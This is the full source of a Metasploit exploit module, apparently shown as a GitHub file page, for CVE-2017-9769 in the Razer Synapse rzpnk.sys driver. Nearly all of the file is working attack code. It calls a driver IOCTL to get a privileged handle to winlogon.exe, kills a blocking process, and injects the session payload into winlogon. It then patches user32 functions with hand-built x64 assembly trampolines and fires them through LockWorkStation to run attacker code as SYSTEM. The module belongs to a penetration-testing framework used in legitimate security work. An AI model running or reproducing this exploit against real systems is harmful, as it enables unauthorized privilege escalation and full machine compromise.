-
Notifications
You must be signed in to change notification settings - Fork 14.3k
/
Copy pathrazer_zwopenprocess.rb
283 lines (243 loc) · 10.2 KB
/
razer_zwopenprocess.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex'
require 'metasm'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Local::WindowsKernel
include Msf::Post::Windows::Priv
# the max size our hook can be, used before it's generated for the allocation
HOOK_STUB_MAX_LENGTH = 256
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',
'Description' => %q{
A vulnerability exists in the latest version of Razer Synapse
(v2.20.15.1104 as of the day of disclosure) which can be leveraged
locally by a malicious application to elevate its privileges to those of
NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
in the rzpnk.sys driver that passes a PID specified by the user to
ZwOpenProcess. This can be issued by an application to open a handle to
an arbitrary process with the necessary privileges to allocate, read and
write memory in the specified process.
This exploit leverages this vulnerability to open a handle to the
winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
installing a hook to execute attacker controlled shellcode. This hook is
then triggered on demand by calling user32!LockWorkStation(), resulting
in the attacker's payload being executed with the privileges of the
infected winlogon process. In order for the issued IOCTL to work, the
RazerIngameEngine.exe process must not be running. This exploit will
check if it is, and attempt to kill it as necessary.
The vulnerable software can be found here:
https://www.razerzone.com/synapse/. No Razer hardware needs to be
connected in order to leverage this vulnerability.
This exploit is not opsec-safe due to the user being logged out as part
of the exploitation process.
},
'Author' => 'Spencer McIntyre',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-9769'],
['URL', 'https://warroom.securestate.com/cve-2017-9769/']
],
'Platform' => 'win',
'Targets' => [
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 10.0.10586
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'WfsDelay' => 20
},
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => '2017-03-22',
'Notes' => {
'Stability' => [ CRASH_SERVICE_RESTARTS ],
'SideEffects' => [ SCREEN_EFFECTS ],
'Reliability' => [ REPEATABLE_SESSION ],
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_fs_md5
stdapi_railgun_api
stdapi_sys_config_driver_list
stdapi_sys_process_kill
stdapi_sys_process_memory_allocate
stdapi_sys_process_memory_protect
stdapi_sys_process_memory_read
stdapi_sys_process_memory_write
]
}
},
)
)
end
def check
# Validate that the driver has been loaded and that
# the version is the same as the one expected
client.sys.config.getdrivers.each do |d|
if d[:basename].downcase == 'rzpnk.sys'
expected_checksum = 'b4598c05d5440250633e25933fff42b0'
target_checksum = client.fs.file.md5(d[:filename])
if expected_checksum == Rex::Text.to_hex(target_checksum, '')
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
end
Exploit::CheckCode::Safe
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if session.platform != 'windows'
fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
elsif session.arch != ARCH_X64
fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
end
pid = session.sys.process['RazerIngameEngine.exe']
if pid
# if this process is running, the IOCTL won't work but the process runs
# with user privileges so we can kill it
print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")
session.sys.process.kill(pid)
end
pid = session.sys.process['winlogon.exe']
print_status("Found winlogon pid: #{pid}")
handle = get_handle(pid)
fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
vprint_status('Successfully opened a handle to the winlogon process')
winlogon = session.sys.process.new(pid, handle)
allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
shellcode_address = winlogon.memory.allocate(allocation_size)
winlogon.memory.protect(shellcode_address)
print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
winlogon.memory.write(shellcode_address, payload.encoded)
hook_stub_address = shellcode_address + payload.encoded.length
result = session.railgun.kernel32.LoadLibraryA('user32')
fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
user32_handle = result['return']
# resolve and backup the functions that we'll install trampolines in
user32_trampolines = {} # address => original chunk
user32_functions = ['LockWindowStation']
user32_functions.each do |function|
address = get_address(user32_handle, function)
winlogon.memory.protect(address)
user32_trampolines[function] = {
address: address,
original: winlogon.memory.read(address, 24)
}
end
# generate and install the hook asm
hook_stub = get_hook(shellcode_address, user32_trampolines)
fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
# if this happens, there was a programming error
fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
winlogon.memory.write(hook_stub_address, hook_stub)
vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
# install the asm trampolines to jump to the hook
user32_trampolines.each do |function, trampoline_info|
address = trampoline_info[:address]
trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
mov rax, 0x#{address.to_s(16)}
push rax
mov rax, 0x#{hook_stub_address.to_s(16)}
jmp rax
}).encode_string
winlogon.memory.write(address, trampoline)
vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")
end
session.railgun.user32.LockWorkStation()
session.railgun.kernel32.CloseHandle(handle)
end
def get_address(dll_handle, function_name)
result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0
result['return']
end
# this is where the actual vulnerability is leveraged
def get_handle(pid)
handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
return nil unless handle
vprint_status('Successfully opened a handle to the driver')
buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')
session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD', [
['DWORD', 'FileHandle', 'in' ],
['DWORD', 'Event', 'in' ],
['LPVOID', 'ApcRoutine', 'in' ],
['LPVOID', 'ApcContext', 'in' ],
['PDWORD', 'IoStatusBlock', 'out'],
['DWORD', 'IoControlCode', 'in' ],
['PBLOB', 'InputBuffer', 'in' ],
['DWORD', 'InputBufferLength', 'in' ],
['PBLOB', 'OutputBuffer', 'out'],
['DWORD', 'OutputBufferLength', 'in' ],
])
result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
return nil if result['return'] != 0
session.railgun.kernel32.CloseHandle(handle)
result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]
end
def get_hook(shellcode_address, restore)
dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
return nil if dll_handle == 0
create_thread_address = get_address(dll_handle, 'CreateThread')
stub = %{
call main
; restore the functions where the trampolines were installed
push rbx
}
restore.each do |function, trampoline_info|
original = trampoline_info[:original].unpack('Q*')
stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}"
original.each do |chunk|
stub << %{
mov rbx, 0x#{chunk.to_s(16)}
mov qword ptr ds:[rax], rbx
add rax, 8
}
end
end
stub << %{
pop rbx
ret
main:
; backup registers we're going to mangle
push r9
push r8
push rdx
push rcx
; setup the arguments for the call to CreateThread
xor rax, rax
push rax ; lpThreadId
push rax ; dwCreationFlags
xor r9, r9 ; lpParameter
mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress
xor rdx, rdx ; dwStackSize
xor rcx, rcx ; lpThreadAttributes
mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread
call rax
add rsp, 16
; restore arguments that were mangled
pop rcx
pop rdx
pop r8
pop r9
ret
}
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
end
end